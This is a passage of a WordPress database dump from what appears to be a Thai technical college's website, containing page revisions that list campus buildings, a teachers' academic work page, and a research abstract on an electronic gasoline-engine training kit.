style=\"color: #800000;\">21. อาคาร 4 ชั้น (อาคาร 13)</span></h2>\r\n<h2><span style=\"color: #800000;\">22. อาคาร 4 ชั้น (อบจ)</span></h2>\r\n<h2><span style=\"color: #800000;\">23. อาคารโรงยาง</span></h2>\r\n<h2><span style=\"color: #800000;\">24. อาคารเทคนิคพื้นฐาน</span></h2>\r\n<h2><span style=\"color: #800000;\">25. อาคารตึกส้ม</span></h2>\r\n<h2><span style=\"color: #800000;\">26. อาคารการโรงแรม</span></h2>\r\n<h2><span style=\"color: #800000;\">27. อาคารธนาคาร</span></h2>\r\n \r\n\r\n \r\n<h3><span style=\"color: #800000;\"> </span></h3>\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n ', 'ข้อมูลอาคารสถานที่', '', 'inherit', 'closed', 'closed', '', '2809-revision-v1', '', '', '2018-07-19 15:06:14', '2018-07-19 08:06:14', '', 2809, 'http://www.technicrayong.ac.th/2809-revision-v1/', 0, 'revision', '', 0),
(3476, 3, '2018-07-19 15:08:07', '2018-07-19 08:08:07', '<img class=\"size-full wp-image-2815 alignleft\" src=\"/wp-content/uploads/2018/05/30-5-2561-14-14-12.jpg\" alt=\"\" width=\"193\" height=\"56\" />\r\n\r\n \r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-2821 size-full\" src=\"/wp-content/uploads/2018/05/30-5-2561-14-28-08.jpg\" alt=\"\" width=\"837\" height=\"287\" />\r\n\r\n<img class=\"wp-image-2817 size-full alignleft\" src=\"/wp-content/uploads/2018/05/30-5-2561-14-21-41.jpg\" alt=\"\" width=\"815\" height=\"261\" />\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<img class=\"aligncenter size-full wp-image-3474\" src=\"/wp-content/uploads/2018/07/111111.jpg\" alt=\"\" width=\"1534\" height=\"742\" />\r\n\r\n<img class=\"wp-image-2824 size-full alignleft\" src=\"/wp-content/uploads/2018/05/42566265256526.jpg\" alt=\"\" width=\"540\" height=\"44\" />\r\n\r\n \r\n<h2><span style=\"color: #ffffff;\">1. อาคารโรงยิ</span></h2>\r\n<h2><span style=\"color: #800000;\">1. อาคารโรงยิม</span></h2>\r\n<h2><span style=\"color: #800000;\">2. อาคารคหกรรม</span></h2>\r\n<h2><span style=\"color: #800000;\">3. อาคารการท่องเที่ยว</span></h2>\r\n<h2><span style=\"color: #800000;\">4. อาคารสารสนเทศ</span></h2>\r\n<h2><span style=\"color: #800000;\">5. อาคารช่างเชื่อมเก่า</span></h2>\r\n<h2><span style=\"color: #800000;\">6. อาคารอิเล็กทรอนิกส์</span></h2>\r\n<h2><span style=\"color: #800000;\">7. อาคารบริหารธุรกิจ</span></h2>\r\n<h2><span style=\"color: #800000;\">8. อาคารปิโตรเคมี</span></h2>\r\n<h2><span style=\"color: #800000;\">9. อาคารโรงอาหาร</span></h2>\r\n<h2><span style=\"color: #800000;\">10. อาคารเรียนเขียนแบบ 2 ชั้น</span></h2>\r\n<h2><span style=\"color: #800000;\">11. อาคารช่างก่อสร้าง</span></h2>\r\n<h2><span style=\"color: #800000;\">12. อาคารตึกอำนวยการ</span></h2>\r\n<h2><span style=\"color: #800000;\">13. อาคาร AUA</span></h2>\r\n<h2><span style=\"color: #800000;\">14. อาคารพัสดุ</span></h2>\r\n<h2><span style=\"color: #800000;\">15. อาคารเขียนแบบเทคนิคพื้นฐาน</span></h2>\r\n<h2><span style=\"color: #800000;\">16. อาคารเรียนสามัญ</span></h2>\r\n<h2><span style=\"color: #800000;\">17. อาคารไฟฟ้ากำลัง</span></h2>\r\n<h2><span style=\"color: #800000;\">18. อาคารเทคโนโลยีอุตสาหกรรม</span></h2>\r\n<h2><span style=\"color: #800000;\">19. อาคารช่างยนต์</span></h2>\r\n<h2><span style=\"color: #800000;\">20. อาคารช่างกลโรงงาน</span></h2>\r\n<h2><span style=\"color: #800000;\">21. อาคาร 4 ชั้น (อาคาร 13)</span></h2>\r\n<h2><span style=\"color: #800000;\">22. อาคาร 4 ชั้น (อบจ)</span></h2>\r\n<h2><span style=\"color: #800000;\">23. อาคารโรงยาง</span></h2>\r\n<h2><span style=\"color: #800000;\">24. อาคารเทคนิคพื้นฐาน</span></h2>\r\n<h2><span style=\"color: #800000;\">25. อาคารตึกส้ม</span></h2>\r\n<h2><span style=\"color: #800000;\">26. อาคารการโรงแรม</span></h2>\r\n<h2><span style=\"color: #800000;\">27. อาคารธนาคาร</span></h2>\r\n \r\n\r\n \r\n<h3><span style=\"color: #800000;\"> </span></h3>\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n ', 'ข้อมูลอาคารสถานที่', '', 'inherit', 'closed', 'closed', '', '2809-revision-v1', '', '', '2018-07-19 15:08:07', '2018-07-19 08:08:07', '', 2809, 'http://www.technicrayong.ac.th/2809-revision-v1/', 0, 'revision', '', 0),
(3479, 1, '2018-07-21 12:10:03', '2018-07-21 05:10:03', '<a href=\"/wp-content/uploads/2018/07/aj-prapas.jpg\"><img class=\"wp-image-6732 aligncenter\" src=\"/wp-content/uploads/2020/01/รูปอาจารย์.png\" alt=\"\" width=\"270\" height=\"406\" /></a>\r\n<p style=\"text-align: center;\">[table id=2 /]</p>\r\n \r\n\r\n \r\n<p style=\"text-align: center;\"><img class=\"alignnone wp-image-6741\" src=\"/wp-content/uploads/2020/02/กรอบรูป-3-.png\" alt=\"\" width=\"269\" height=\"404\" /></p>\r\n<p style=\"text-align: center;\">[table id=7 /]</p>\r\n \r\n<p style=\"text-align: center;\"><img class=\"alignnone wp-image-6743\" src=\"/wp-content/uploads/2020/02/กรอบรูป4-.png\" alt=\"\" width=\"270\" height=\"405\" /></p>\r\n<p style=\"text-align: center;\">[table id=11 /]</p>\r\n<p style=\"text-align: center;\"><a href=\"/%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%a7%e0%b8%b4%e0%b8%8a%e0%b8%b2%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%82%e0%b8%ad%e0%b8%87%e0%b8%84%e0%b8%a3%e0%b8%b9-%e0%b8%ad%e0%b8%b2%e0%b8%88%e0%b8%b2/attachment/327385/\"><img class=\"alignnone wp-image-12562\" src=\"/wp-content/uploads/2022/02/327385.jpg\" alt=\"\" width=\"272\" height=\"408\" /></a></p>\r\n<p style=\"text-align: center;\">[table id=17 /]</p>\r\n<p style=\"text-align: center;\"><a href=\"/%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%a7%e0%b8%b4%e0%b8%8a%e0%b8%b2%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%82%e0%b8%ad%e0%b8%87%e0%b8%84%e0%b8%a3%e0%b8%b9-%e0%b8%ad%e0%b8%b2%e0%b8%88%e0%b8%b2/327365-2/\"><img class=\"alignnone wp-image-12577\" src=\"/wp-content/uploads/2022/02/327365-1.jpg\" alt=\"\" width=\"272\" height=\"408\" /></a></p>\r\n<p style=\"text-align: center;\">[table id=19 /]</p>', 'ผลงานวิชาการของครู-อาจารย์', '', 'publish', 'closed', 'closed', '', '%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%a7%e0%b8%b4%e0%b8%8a%e0%b8%b2%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%82%e0%b8%ad%e0%b8%87%e0%b8%84%e0%b8%a3%e0%b8%b9-%e0%b8%ad%e0%b8%b2%e0%b8%88%e0%b8%b2', '', '', '2022-02-11 16:01:48', '2022-02-11 09:01:48', '', 0, 'http://www.technicrayong.ac.th/?page_id=3479', 0, 'page', '', 0),
(3481, 1, '2018-07-21 12:08:33', '2018-07-21 05:08:33', '', 'aj-prapas', '', 'inherit', 'closed', 'closed', '', 'aj-prapas', '', '', '2018-07-21 12:08:33', '2018-07-21 05:08:33', '', 3479, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/07/aj-prapas.jpg', 0, 'attachment', 'image/jpeg', 0),
(3482, 1, '2018-07-21 12:10:03', '2018-07-21 05:10:03', '<a href=\"/wp-content/uploads/2018/07/aj-prapas.jpg\"><img class=\"wp-image-3481 aligncenter\" src=\"/wp-content/uploads/2018/07/aj-prapas.jpg\" alt=\"\" width=\"150\" height=\"189\" /></a>\r\n\r\n ', 'ผลงานวิชาการของครู-อาจารย์', '', 'inherit', 'closed', 'closed', '', '3479-revision-v1', '', '', '2018-07-21 12:10:03', '2018-07-21 05:10:03', '', 3479, 'http://www.technicrayong.ac.th/3479-revision-v1/', 0, 'revision', '', 0),
(3484, 1, '2018-07-21 12:14:42', '2018-07-21 05:14:42', '[[\"\\u0e19\\u0e32\\u0e22\\u0e1b\\u0e23\\u0e30\\u0e20\\u0e32\\u0e2a \\u0e1e\\u0e27\\u0e07\\u0e0a\\u0e37\\u0e48\\u0e19\",\"\\u0e04\\u0e23\\u0e39\\u0e0a\\u0e33\\u0e19\\u0e32\\u0e0d\\u0e01\\u0e32\\u0e23\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\",\"<a href=\\\"\\/prapas\\\">\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e2d\\u0e48\\u0e32\\u0e19<\\/a>\"]]', 'Work Teacher', 'ผลงานวิชาการของครู-อาจารย์', 'publish', 'closed', 'closed', '', 'work-teacher', '', '', '2020-02-01 11:23:40', '2020-02-01 04:23:40', '', 0, 'http://www.technicrayong.ac.th/?post_type=tablepress_table&p=3484', 0, 'tablepress_table', 'application/json', 0),
(3485, 1, '2018-07-21 12:20:13', '2018-07-21 05:20:13', '<img class=\"wp-image-6732 aligncenter\" src=\"/wp-content/uploads/2020/01/รูปอาจารย์.png\" alt=\"\" width=\"360\" height=\"541\" />\r\n\r\n \r\n\r\n<img class=\"wp-image-6721 aligncenter\" src=\"/wp-content/uploads/2020/01/Untitled-6.png\" alt=\"\" width=\"1051\" height=\"420\" />\r\n\r\n \r\n\r\n<img class=\"wp-image-6575 aligncenter\" src=\"/wp-content/uploads/2020/01/0.1บทคัดย่อ.jpg\" alt=\"\" width=\"1000\" height=\"1415\" />\r\n\r\n<img class=\"wp-image-6576 aligncenter\" src=\"/wp-content/uploads/2020/01/0.2Abstract.jpg\" alt=\"\" width=\"1029\" height=\"1456\" />\r\n\r\n \r\n\r\n \r\n\r\n \r\n<p style=\"text-align: center;\"><img class=\"alignnone wp-image-6728\" src=\"/wp-content/uploads/2020/01/Untitled-8.png\" alt=\"\" width=\"967\" height=\"386\" /></p>\r\n<img class=\"wp-image-6577 aligncenter\" src=\"/wp-content/uploads/2020/01/1ปวช.jpg\" alt=\"\" width=\"942\" height=\"666\" />\r\n\r\n<img class=\"wp-image-6578 aligncenter\" src=\"/wp-content/uploads/2020/01/2ทลบ.jpg\" alt=\"\" width=\"944\" height=\"668\" />\r\n\r\n \r\n<p style=\"text-align: center;\"><a href=\"/%e0%b9%81%e0%b8%9a%e0%b8%9a%e0%b8%a3%e0%b9%88%e0%b8%b2%e0%b8%87-%e0%b8%95%e0%b8%b1%e0%b8%a7%e0%b8%ad%e0%b8%a2%e0%b9%88%e0%b8%b2%e0%b8%87%e0%b9%83%e0%b8%9a%e0%b8%87%e0%b8%b2%e0%b8%99/\"><img class=\"alignnone wp-image-6684\" src=\"/wp-content/uploads/2020/01/ปุ่มไอคอน1.jpg\" alt=\"\" width=\"119\" height=\"119\" /></a> <a href=\"/vdo-%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%97%e0%b8%b3%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%8a%e0%b8%b8%e0%b8%94%e0%b8%9d%e0%b8%b6%e0%b8%81/\"><img class=\"alignnone wp-image-6683\" src=\"/wp-content/uploads/2020/01/Untitled-1.jpg\" alt=\"\" width=\"120\" height=\"120\" /></a> <a href=\"/vdo-%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b9%83%e0%b8%8a%e0%b9%89%e0%b9%80%e0%b8%84%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a1%e0%b8%b7%e0%b8%ad%e0%b8%95%e0%b8%a3%e0%b8%a7%e0%b8%88%e0%b8%a7/\"><img class=\"alignnone wp-image-6683\" src=\"/wp-content/uploads/2020/01/Untitled-1.jpg\" alt=\"\" width=\"120\" height=\"120\" /></a></p>\r\n\r\n<h3 style=\"text-align: center;\"> แบบร่างชุดฝึก/ตัวอย่างใบงาน VDO การทำงานชุดฝึก VDO การใช้เครื่องมือตรวจวัด</h3>\r\n \r\n\r\n[COUNTER_NUMBER id=3504]', 'การสร้างและหาประสิทธิภาพชุดฝึกระบบเครื่องยนต์แก๊สโซลีนควบคุมด้วยอิเล็กทรอนิกส์', '', 'publish', 'closed', 'closed', '', 'prapas', '', '', '2020-01-31 22:42:41', '2020-01-31 15:42:41', '', 0, 'http://www.technicrayong.ac.th/?page_id=3485', 0, 'page', '', 0),
(3486, 1, '2018-07-21 12:20:13', '2018-07-21 05:20:13', 'ชื่อ : นายประภาส พวงชื่น\r\nชื่องานวิจัย : การสร้างและหาประสิทธิภาพชุดฝึกระบบเครื่องยนต์แก๊สโซลีนควบคุมด้วยอิเล็กทรอนิกส์\r\nพ.ศ. : 2560\r\n\r\nบทคัดย่อ\r\n\r\nการศึกษาวิจัยในครั้งนี้เป็นวิจัยเชิงทดลอง (Experimental Research) มีวัตถุประสงค์เพื่อ 1) สร้างชุดฝึกระบบเครื่องยนต์แก๊สโซลีนควบคุมด้วยอิเล็กทรอนิกส์ให้มีคุณภาพ 2) หาประสิทธิภาพชุดฝึกระบบเครื่องยนต์แก๊สโซลีนควบคุมด้วยอิเล็กทรอนิกส์ที่สร้างขึ้น 3) เปรียบเทียบผลสัมฤทธิ์ทางการเรียนของนักศึกษาก่อนเรียนและหลังเรียนโดยใช้ชุดฝึกระบบเครื่องยนต์แก๊สโซลีนควบคุมด้วยอิเล็กทรอนิกส์ 4) เปรียบเทียบทักษะปฏิบัติระบบเครื่องยนต์แก๊สโซลีนควบคุมด้วยอิเล็กทรอนิกส์ของนักศึกษาเทียบกับเกณฑ์\r\n\r\nปีการศึกษา 2559 ผู้วิจัยนำชุดฝึกระบบเครื่องยนต์แก๊สโซลีนควบคุมด้วยอิเล็กทรอนิกส์ที่สร้างขึ้นไปทดลองใช้กับนักศึกษาประกาศนียบัตรวิชาชีพชั้นสูง สาขาวิชาช่างยนต์ที่ผู้วิจัยรับผิดชอบสอน โดยทดลองใช้ชุดฝึกกับนักศึกษารายบุคคล 1 คน จากนั้นปรับปรุงชุดฝึกไปทดลองใช้กับนักศึกษากลุ่มเล็ก 3 คน นำข้อบกพร่องแก้ไข แล้วจึงนำชุดฝึกไปใช้กับนักศึกษากลุ่มใหญ่ 18 คน เพื่อหาประสิทธิภาพของชุดฝึก โดยใช้เกณฑ์ 80/80\r\n\r\nปีการศึกษา 2560 ทดสอบวัดผลสัมฤทธิ์ทางการเรียนก่อนเรียน (Pre-test) ของนักศึกษา จากนั้นใช้ชุดฝึกระบบเครื่องยนต์แก๊สโซลีนควบคุมด้วยอิเล็กทรอนิกส์ในการเรียนการสอน แล้วให้ผู้เรียนทำแบบทดสอบวัดผลสัมฤทธิ์ทางการเรียนหลังเรียน (Post test) ด้วยแบบทดสอบวัดผลสัมฤทธิ์ทางการเรียนรายวิชางานระบบเครื่องยนต์แก๊สโซลีนควบคุมด้วยอิเล็กทรอนิกส์ รหัสวิชา 3101-2101 จำนวน 40 ข้อ\r\n\r\nผลการวิจัยพบว่า คุณภาพของชุดฝึกระบบเครื่องยนต์แก๊สโซลีนควบคุมด้วยอิเล็กทรอนิกส์ เมื่อพิจารณาเป็นรายด้านพบว่า ด้านการออกแบบสร้างชุดฝึก มีค่าเฉลี่ยเท่ากับ 4.76 และด้านเอกสารประกอบชุดฝึกมีค่าเฉลี่ยเท่ากับ 4.73 ค่าเฉลี่ยรวมทุกด้านเท่ากับ 4.75 สูงกว่าเกณฑ์ที่กำหนดค่าเฉลี่ยรวมไม่ต่ำกว่า 3.50 ชุดฝึกระบบเครื่องยนต์แก๊สโซลีนควบคุมด้วยอิเล็กทรอนิกส์ที่ผู้วิจัยสร้างขึ้นมีประสิทธิภาพเท่ากับ 89.92/88.83 สูงกว่าเกณฑ์ 80/80 ที่กำหนดไว้ ผลสัมฤทธิ์ทางการเรียนของนักศึกษาก่อนและหลัง โดยใช้ชุดฝึกระบบเครื่องยนต์แก๊ส โซลีนควบคุมด้วยอิเล็กทรอนิกส์แตกต่างกันอย่างมีนัยสำคัญทางสถิติที่ระดับ .05 นั่นคือ ผลสัมฤทธิ์ทางการเรียน ของนักศึกษาที่เรียนโดยใช้ชุดฝึกระบบเครื่องยนต์แก๊สโซลีนควบคุมด้วยอิเล็กทรอนิกส์หลังเรียนสูงกว่าก่อนเรียน ทักษะการปฏิบัติระบบเครื่องยนต์แก๊สโซลีนควบคุมด้วยอิเล็กทรอนิกส์ของนักศึกษาทุกเรื่องสูงกว่าเกณฑ์(ร้อยละ 70) อย่างมีนัยสำคัญทางสถิติที่ระดับ .05\r\n\r\n \r\n\r\nhttps://youtu.be/a7qGKlOZTuc\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\nhttps://youtu.be/mRsG_Ypyppw', 'การสร้างและหาประสิทธิภาพชุดฝึกระบบเครื่องยนต์แก๊สโซลีนควบคุมด้วยอิเล็กทรอนิกส์', '', 'inherit', 'closed', 'closed', '', '3485-revision-v1', '', '', '2018-07-21 12:20:13', '2018-07-21 05:20:13', '', 3485, 'http://www.technicrayong.ac.th/3485-revision-v1/', 0, 'revision', '', 0),
(3488, 1, '2018-07-21 12:23:00', '2018-07-21 05:23:00', '[[\"\\u0e19\\u0e32\\u0e22\\u0e1b\\u0e23\\u0e30\\u0e20\\u0e32\\u0e2a \\u0e1e\\u0e27\\u0e07\\u0e0a\\u0e37\\u0e48\\u0e19\",\"\\u0e04\\u0e23\\u0e39\\u0e0a\\u0e33\\u0e19\\u0e32\\u0e0d\\u0e01\\u0e32\\u0e23\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\",\"http:\\/\\/www.technicrayong.ac.th\\/%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%AA%E0%B8%A3%E0%B9%89%E0%B8%B2%E0%B8%87%E0%B9%81%E0%B8%A5%E0%B8%B0%E0%B8%AB%E0%B8%B2%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%AA%E0%B8%B4%E0%B8%97%E0%B8%98%E0%B8%B4%E0%B8%A0\\/\"]]', 'Work Teacher', 'ผลงานวิชาการของครู-อาจารย์', 'inherit', 'closed', 'closed', '', '3484-revision-v1', '', '', '2018-07-21 12:23:00', '2018-07-21 05:23:00', '', 3484, 'http://www.technicrayong.ac.th/3484-revision-v1/', 0, 'revision', '', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(3489, 1, '2018-07-21 12:24:32', '2018-07-21 05:24:32', '[[\"\\u0e19\\u0e32\\u0e22\\u0e1b\\u0e23\\u0e30\\u0e20\\u0e32\\u0e2a \\u0e1e\\u0e27\\u0e07\\u0e0a\\u0e37\\u0e48\\u0e19\",\"\\u0e04\\u0e23\\u0e39\\u0e0a\\u0e33\\u0e19\\u0e32\\u0e0d\\u0e01\\u0e32\\u0e23\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\",\"<a href=\\\"http:\\/\\/www.technicrayong.ac.th\\/%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%AA%E0%B8%A3%E0%B9%89%E0%B8%B2%E0%B8%87%E0%B9%81%E0%B8%A5%E0%B8%B0%E0%B8%AB%E0%B8%B2%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%AA%E0%B8%B4%E0%B8%97%E0%B8%98%E0%B8%B4%E0%B8%A0\\/\\\">\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e2d\\u0e48\\u0e32\\u0e19<\\/a>\"]]', 'Work Teacher', 'ผลงานวิชาการของครู-อาจารย์', 'inherit', 'closed', 'closed', '', '3484-revision-v1', '', '', '2018-07-21 12:24:32', '2018-07-21 05:24:32', '', 3484, 'http://www.technicrayong.ac.th/3484-revision-v1/', 0, 'revision', '', 0),
(3492, 1, '2018-07-21 12:26:49', '2018-07-21 05:26:49', '<a href=\"/wp-content/uploads/2018/07/aj-prapas.jpg\"><img class=\"wp-image-3481 aligncenter\" src=\"/wp-content/uploads/2018/07/aj-prapas.jpg\" alt=\"\" width=\"150\" height=\"189\" /></a>\r\n<p style=\"text-align: center;\">[table id=2 /]</p>', 'ผลงานวิชาการของครู-อาจารย์', '', 'inherit', 'closed', 'closed', '', '3479-revision-v1', '', '', '2018-07-21 12:26:49', '2018-07-21 05:26:49', '', 3479, 'http://www.technicrayong.ac.th/3479-revision-v1/', 0, 'revision', '', 0),
(3494, 1, '2018-07-21 12:32:06', '2018-07-21 05:32:06', '[[\"\\u0e19\\u0e32\\u0e22\\u0e1b\\u0e23\\u0e30\\u0e20\\u0e32\\u0e2a \\u0e1e\\u0e27\\u0e07\\u0e0a\\u0e37\\u0e48\\u0e19\",\" \\u0e04\\u0e23\\u0e39\\u0e0a\\u0e33\\u0e19\\u0e32\\u0e0d\\u0e01\\u0e32\\u0e23\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\",\"<a href=\\\"http:\\/\\/www.technicrayong.ac.th\\/%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%AA%E0%B8%A3%E0%B9%89%E0%B8%B2%E0%B8%87%E0%B9%81%E0%B8%A5%E0%B8%B0%E0%B8%AB%E0%B8%B2%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%AA%E0%B8%B4%E0%B8%97%E0%B8%98%E0%B8%B4%E0%B8%A0\\/\\\">\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e2d\\u0e48\\u0e32\\u0e19<\\/a>\"]]', 'Work Teacher', 'ผลงานวิชาการของครู-อาจารย์', 'inherit', 'closed', 'closed', '', '3484-revision-v1', '', '', '2018-07-21 12:32:06', '2018-07-21 05:32:06', '', 3484, 'http://www.technicrayong.ac.th/3484-revision-v1/', 0, 'revision', '', 0),
(3495, 1, '2018-07-21 12:33:10', '2018-07-21 05:33:10', '[[\"\\u0e19\\u0e32\\u0e22\\u0e1b\\u0e23\\u0e30\\u0e20\\u0e32\\u0e2a \\u0e1e\\u0e27\\u0e07\\u0e0a\\u0e37\\u0e48\\u0e19\",\"<\\/center>\\u0e04\\u0e23\\u0e39\\u0e0a\\u0e33\\u0e19\\u0e32\\u0e0d\\u0e01\\u0e32\\u0e23\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29<\\/center>\",\"<a href=\\\"http:\\/\\/www.technicrayong.ac.th\\/%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%AA%E0%B8%A3%E0%B9%89%E0%B8%B2%E0%B8%87%E0%B9%81%E0%B8%A5%E0%B8%B0%E0%B8%AB%E0%B8%B2%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%AA%E0%B8%B4%E0%B8%97%E0%B8%98%E0%B8%B4%E0%B8%A0\\/\\\">\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e2d\\u0e48\\u0e32\\u0e19<\\/a>\"]]', 'Work Teacher', 'ผลงานวิชาการของครู-อาจารย์', 'inherit', 'closed', 'closed', '', '3484-revision-v1', '', '', '2018-07-21 12:33:10', '2018-07-21 05:33:10', '', 3484, 'http://www.technicrayong.ac.th/3484-revision-v1/', 0, 'revision', '', 0),
(3496, 1, '2018-07-21 12:34:00', '2018-07-21 05:34:00', '[[\"\\u0e19\\u0e32\\u0e22\\u0e1b\\u0e23\\u0e30\\u0e20\\u0e32\\u0e2a \\u0e1e\\u0e27\\u0e07\\u0e0a\\u0e37\\u0e48\\u0e19\",\"   \\u0e04\\u0e23\\u0e39\\u0e0a\\u0e33\\u0e19\\u0e32\\u0e0d\\u0e01\\u0e32\\u0e23\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\",\"<a href=\\\"http:\\/\\/www.technicrayong.ac.th\\/%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%AA%E0%B8%A3%E0%B9%89%E0%B8%B2%E0%B8%87%E0%B9%81%E0%B8%A5%E0%B8%B0%E0%B8%AB%E0%B8%B2%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%AA%E0%B8%B4%E0%B8%97%E0%B8%98%E0%B8%B4%E0%B8%A0\\/\\\">\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e2d\\u0e48\\u0e32\\u0e19<\\/a>\"]]', 'Work Teacher', 'ผลงานวิชาการของครู-อาจารย์', 'inherit', 'closed', 'closed', '', '3484-revision-v1', '', '', '2018-07-21 12:34:00', '2018-07-21 05:34:00', '', 3484, 'http://www.technicrayong.ac.th/3484-revision-v1/', 0, 'revision', '', 0),
(3497, 1, '2018-07-21 12:34:29', '2018-07-21 05:34:29', '[[\"\\u0e19\\u0e32\\u0e22\\u0e1b\\u0e23\\u0e30\\u0e20\\u0e32\\u0e2a \\u0e1e\\u0e27\\u0e07\\u0e0a\\u0e37\\u0e48\\u0e19\",\"  &;nbsp\\u0e04\\u0e23\\u0e39\\u0e0a\\u0e33\\u0e19\\u0e32\\u0e0d\\u0e01\\u0e32\\u0e23\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\",\"<a href=\\\"http:\\/\\/www.technicrayong.ac.th\\/%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%AA%E0%B8%A3%E0%B9%89%E0%B8%B2%E0%B8%87%E0%B9%81%E0%B8%A5%E0%B8%B0%E0%B8%AB%E0%B8%B2%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%AA%E0%B8%B4%E0%B8%97%E0%B8%98%E0%B8%B4%E0%B8%A0\\/\\\">\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e2d\\u0e48\\u0e32\\u0e19<\\/a>\"]]', 'Work Teacher', 'ผลงานวิชาการของครู-อาจารย์', 'inherit', 'closed', 'closed', '', '3484-revision-v1', '', '', '2018-07-21 12:34:29', '2018-07-21 05:34:29', '', 3484, 'http://www.technicrayong.ac.th/3484-revision-v1/', 0, 'revision', '', 0),
(3498, 1, '2018-07-21 12:35:05', '2018-07-21 05:35:05', '[[\"\\u0e19\\u0e32\\u0e22\\u0e1b\\u0e23\\u0e30\\u0e20\\u0e32\\u0e2a \\u0e1e\\u0e27\\u0e07\\u0e0a\\u0e37\\u0e48\\u0e19\",\"  \\u0e04\\u0e23\\u0e39\\u0e0a\\u0e33\\u0e19\\u0e32\\u0e0d\\u0e01\\u0e32\\u0e23\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\",\"<a href=\\\"http:\\/\\/www.technicrayong.ac.th\\/%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%AA%E0%B8%A3%E0%B9%89%E0%B8%B2%E0%B8%87%E0%B9%81%E0%B8%A5%E0%B8%B0%E0%B8%AB%E0%B8%B2%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%AA%E0%B8%B4%E0%B8%97%E0%B8%98%E0%B8%B4%E0%B8%A0\\/\\\">\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e2d\\u0e48\\u0e32\\u0e19<\\/a>\"]]', 'Work Teacher', 'ผลงานวิชาการของครู-อาจารย์', 'inherit', 'closed', 'closed', '', '3484-revision-v1', '', '', '2018-07-21 12:35:05', '2018-07-21 05:35:05', '', 3484, 'http://www.technicrayong.ac.th/3484-revision-v1/', 0, 'revision', '', 0),
(3499, 1, '2018-07-21 12:35:25', '2018-07-21 05:35:25', '[[\"\\u0e19\\u0e32\\u0e22\\u0e1b\\u0e23\\u0e30\\u0e20\\u0e32\\u0e2a \\u0e1e\\u0e27\\u0e07\\u0e0a\\u0e37\\u0e48\\u0e19\",\";  \\u0e04\\u0e23\\u0e39\\u0e0a\\u0e33\\u0e19\\u0e32\\u0e0d\\u0e01\\u0e32\\u0e23\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\",\"<a href=\\\"http:\\/\\/www.technicrayong.ac.th\\/%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%AA%E0%B8%A3%E0%B9%89%E0%B8%B2%E0%B8%87%E0%B9%81%E0%B8%A5%E0%B8%B0%E0%B8%AB%E0%B8%B2%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%AA%E0%B8%B4%E0%B8%97%E0%B8%98%E0%B8%B4%E0%B8%A0\\/\\\">\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e2d\\u0e48\\u0e32\\u0e19<\\/a>\"]]', 'Work Teacher', 'ผลงานวิชาการของครู-อาจารย์', 'inherit', 'closed', 'closed', '', '3484-revision-v1', '', '', '2018-07-21 12:35:25', '2018-07-21 05:35:25', '', 3484, 'http://www.technicrayong.ac.th/3484-revision-v1/', 0, 'revision', '', 0),
